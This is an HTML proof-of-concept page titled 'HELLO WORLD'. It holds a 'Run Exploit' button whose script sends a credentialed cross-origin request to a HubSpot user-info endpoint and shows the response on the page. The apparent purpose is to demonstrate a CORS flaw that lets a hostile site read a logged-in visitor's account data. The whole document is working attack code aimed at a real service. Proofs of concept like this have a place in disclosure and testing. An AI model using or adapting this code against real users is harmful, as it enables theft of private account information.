<!DOCTYPE html>
<html>
<head>
  <title>HELLO WORLD</title>
</head>
<body>
  <h2>HELLO WORLD</h2>
  <button onclick="exploit()">Run Exploit</button>
  <pre id="output"></pre>

  <script>
    function exploit() {
      var xhr = new XMLHttpRequest();
      xhr.open("GET", "https://app-eu1.hubspot.com/api/login-verify/user-info", true); 

      xhr.withCredentials = true; 

      xhr.onreadystatechange = function () {
        if (xhr.readyState === 4) {
          document.getElementById("output").innerText = xhr.responseText;
        }
      };

      xhr.send();
    }
  </script>
</body>
</html>
